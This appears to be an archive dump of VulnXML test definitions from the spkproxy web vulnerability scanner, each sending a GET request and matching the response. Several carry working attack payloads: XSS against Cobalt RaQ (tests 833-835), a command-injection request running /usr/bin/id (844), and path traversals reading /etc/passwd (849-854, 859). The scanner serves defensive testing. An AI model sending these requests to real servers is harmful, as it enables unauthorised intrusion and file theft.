spkproxy/VulnXML/DirectoryTests/directorytest-829.xml0100664000076500007650000000712107566204543021670 0ustar davedave () "Directory indexing of CGI directory should be disabled." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path} HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Directory Listing 200 Directory Listing 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-830.xml0100664000076500007650000000710107566204543021656 0ustar davedave () "Directory indexing of CGI directory should be disabled." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path} HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-831.xml0100664000076500007650000000705007566204543021662 0ustar davedave (.access) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.access HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-832.xml0100664000076500007650000000705407566204543021667 0ustar davedave (.cobalt) "May allow remote admin of CGI scripts." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.cobalt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-833.xml0100664000076500007650000000761507566204543021673 0ustar davedave (.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('Vulnerable')</script>) "Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-834.xml0100664000076500007650000000743607566204543021675 0ustar davedave (.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>) "Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ alert\('Vulnerable'\) 200 alert\('Vulnerable'\) 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-835.xml0100664000076500007650000000753007566204543021671 0ustar davedave (.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>) "Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-836.xml0100664000076500007650000000703407566204543021671 0ustar davedave (.fhp) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.fhp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-837.xml0100664000076500007650000000705407566204543021674 0ustar davedave (.htaccess) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.htaccess HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-838.xml0100664000076500007650000000712307566204543021672 0ustar davedave (.htaccess.old) "Backup/Old copy of .htaccess - Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.htaccess.old HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-839.xml0100664000076500007650000000712507566204543021675 0ustar davedave (.htaccess.save) "Backup/Old copy of .htaccess - Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.htaccess.save HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-840.xml0100664000076500007650000000711507566204543021664 0ustar davedave (.htaccess~) "Backup/Old copy of .htaccess - Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.htaccess~ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-841.xml0100664000076500007650000000705407566204543021667 0ustar davedave (.htpasswd) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.htpasswd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-842.xml0100664000076500007650000000705007566204543021664 0ustar davedave (.passwd) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-843.xml0100664000076500007650000000700407566204543021664 0ustar davedave (/) GET 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ stat\.pl 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} stat\.pl spkproxy/VulnXML/DirectoryTests/directorytest-844.xml0100664000076500007650000000723407566204543021672 0ustar davedave (/ans/ans.pl?p=../../../../../usr/bin/id|&blah) "Avenger's News System allows commands to be issued remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}/ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ uid 200 uid 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-845.xml0100664000076500007650000000730507566204543021672 0ustar davedave (/GW5/GWWEB.EXE?HELP=bad-request) "Groupwise allows system information and file retrieval by modifying arguments to the help system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}/GW5/GWWEB.EXE?HELP=bad-request HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Could not find file SYS 200 Could not find file SYS 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-846.xml0100664000076500007650000000727507566204543021701 0ustar davedave (/GWWEB.EXE?HELP=bad-request) "Groupwise allows system information and file retrieval by modifying arguments to the help system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}/GWWEB.EXE?HELP=bad-request HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Could not find file SYS 200 Could not find file SYS 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-847.xml0100664000076500007650000000715007566204543021672 0ustar davedave (/rightfax/fuwww.dll/?) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}/rightfax/fuwww.dll/? HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-848.xml0100664000076500007650000000713607566204543021677 0ustar davedave (/scripts/*%0a.pl) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}/scripts/*%0a.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-849.xml0100664000076500007650000000736507566204543021704 0ustar davedave (14all-1.1.cgi?cfg=../../../../../../../../etc/passwd) "Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-850.xml0100664000076500007650000000735507566204543021673 0ustar davedave (14all.cgi?cfg=../../../../../../../../etc/passwd) "Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}14all.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-851.xml0100664000076500007650000000724707566204543021674 0ustar davedave (a1disp3.cgi?../../../../../../../../../../etc/passwd) "This CGI allows attackers read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}a1disp3.cgi?../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-852.xml0100664000076500007650000000726707566204543021677 0ustar davedave (a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd) "This CGI allows attackers read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-853.xml0100664000076500007650000000720007566204543021663 0ustar davedave (a1stats/a1disp3.cgi?../../../../../../../etc/passwd) "Remote file retrieval." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}a1stats/a1disp3.cgi?../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-854.xml0100664000076500007650000000720007566204543021664 0ustar davedave (a1stats/a1disp4.cgi?../../../../../../../etc/passwd) "Remote file retrieval." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}a1stats/a1disp4.cgi?../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-855.xml0100664000076500007650000000711607566204543021673 0ustar davedave (addbanner.cgi) "This CGI may allow attackers to read any file on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}addbanner.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-856.xml0100664000076500007650000000712407566204543021673 0ustar davedave (adduser.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}adduser.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-857.xml0100664000076500007650000000705207566204543021674 0ustar davedave (add_ftp.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}add_ftp.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-858.xml0100664000076500007650000000704607566204543021700 0ustar davedave (admin.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}admin.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-859.xml0100664000076500007650000000726307566204543021702 0ustar davedave (admin.cgi?list=../../../../../../../../../../etc/passwd) "Add2it Mailman Free V1.73 allows arbitrary files to be retrieved." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}admin.cgi?list=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-860.xml0100664000076500007650000000704607566204543021671 0ustar davedave (admin.php) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}admin.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-861.xml0100664000076500007650000000705007566204543021665 0ustar davedave (admin.php3) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}admin.php3 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-862.xml0100664000076500007650000000703407566204543021670 0ustar davedave (admin.pl) "Might be interesting" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}admin.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-863.xml0100664000076500007650000000714007566204543021667 0ustar davedave (adminhot.cgi) "This might be interesting... has been seen in web logs from another CGI scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}adminhot.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-864.xml0100664000076500007650000000714007566204543021670 0ustar davedave (adminwww.cgi) "This might be interesting... has been seen in web logs from another CGI scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}adminwww.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-865.xml0100664000076500007650000000743607566204543021701 0ustar davedave 